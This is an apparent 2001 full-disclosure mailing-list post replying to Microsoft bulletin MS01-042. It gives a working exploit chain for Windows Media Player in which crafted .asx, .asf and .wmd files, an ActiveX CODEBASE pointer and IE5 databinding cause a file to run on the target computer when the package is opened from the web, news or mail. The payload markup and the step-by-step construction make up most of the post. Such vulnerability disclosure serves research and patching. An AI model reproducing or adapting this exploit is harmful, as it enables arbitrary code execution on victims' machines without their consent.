Re: Microsoft Security Bulletin MS01-042 [a.k.a. - Windows Media Player File Execution ]

["http-equiv () excite com" <http-equiv () excite com>]

> - ----------------------------------------------------------------------
> Title:      Windows Media Player .NSC Processor Contains Unchecked
>             Buffer
> Date:       26 July 2001
> Software:   Windows Media Player 6.4, 7, and 7.1
> Impact:     Run code of attacker's choice.
> Bulletin:   MS01-042



Here, while you are about it, take a look at this:

Windows Media Player executing files on the target computer as follows:

1. Create an *.asx meta file as follows:

<ASX><Entry><ref HREF=''/></ASX>
<IFRAME SRC='about:<body><html><OBJECT
CLASSID="CLSID:10000000-0000-0000-0000-000000000000"
CODEBASE="C:\WINDOWS\Regedit.exe"></OBJECT></html></body>'></IFRAME>
<!-- 27.07.01 http://www.malware.com -->

2. Create an *.asf file with URL flip as follows:

about:<OBJECT ID="Content" WIDTH=0 HEIGHT=0
CLASSID="CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="file://C:\My Documents\My Music\Virtual
Albums\malware\malware.asx"><PARAM NAME="UseHeader"
VALUE="true"></OBJECT><div   datasrc=#Content
datafld="&lt;ASX&gt;&lt;Entry&gt;&lt;ref HREF=''/&gt;&lt;/ASX&gt;"
dataformatas="HTML" style="width: 100%; height: 60%;"></div>


3. Create a *.wmd file comprising 1 and 2 above.

What happens?

Ordinarily the Windows Media Download Package file (*.wmd) creates a folder
with the given name of the *.wmd file -- e.g. malware.wmd will create a
folder called malware in the default location for so-called "Virtual Music"
-- specifically: My Documents\My Music\Virtual Albums\malware, security
measures currently incorporated in the extraction of the contents of the
*.wmd do a reasonably good job of ensuring that files contained within the
Download Package, are in fact valid files.

A reasonably good job.

We find that the bare minimum for the *.asx meta file must include the
following:

<ASX><Entry><ref HREF=''/></ASX>

with these tags the Media Player will indeed extract the *.asx file into our
known folder. So how do we make use of that?

Databinding.

We find that we can parse html using the databinding control included in
IE5. And we do it like so:

the databinding control requires a header to match what it is to write as
html. What we do, quite brilliantly actually, is use the *.asx header as our
header for the databinding control:

*.asx - <ASX><Entry><ref HREF=''/></ASX>

databinding control: datafld="&lt;ASX&gt;&lt;Entry&gt;&lt;ref
HREF=''/&gt;&lt;/ASX&gt;" 

The Windows Media Package file (malware.wmd) is automatically opened from
web or news or mail, it automatically creates the malware folder in the
so-called 'Virtual Music" directory. It automatically extracts the
malware.asx meta file, which is valid but includes our Active X component as
above, and it extracts our malware.asf file which includes our URL flip. 
The URL flip is called once the malware.asf starts playing, it creates an
"about" window from within the malware folder, the "about" window includes
our databinding control which points to the malware.asx which rendered as
*.html because the datafld header *IS* the *.asx meta tag !

And that all in turn executes! our file on the target computer.

notes: 

1. the machine that this is all on is now dead thanks to your module
MSDXM.OCX which will require a reformat. Nevertheless a fully functional
example has been thoroughly tested in "the field"
2. the "free" Advanced Script Indexer that comes with the Windows Media 7
Resource Kit allows us to include in the URL flip whatever we like.
3. the path to the so-called "Virtual Music" directory is hard-coded in the
above.  The possibility of not having to know the location is good because
everything is opened from within the same folder created by the Windows
Media Download package i.e. possibly through a "skin" file, or some other
entry in the *.asx such as an <event> parameter coupled with scripting in
the *.asf or *.wmz file(s), relative paths should work.
4. when it suits us, we'll recompile the working example if none of the
above is clear.
5. it took 10 days to conceive, craft and construct, of which about 5 days
were spent crashing and scandisk"ing" at minimum 4 times per day. Win98.
Very unstable.


---
http://www.malware.com





_______________________________________________________
Send a cool gift with your E-Card
http://www.bluemountain.com/giftcenter/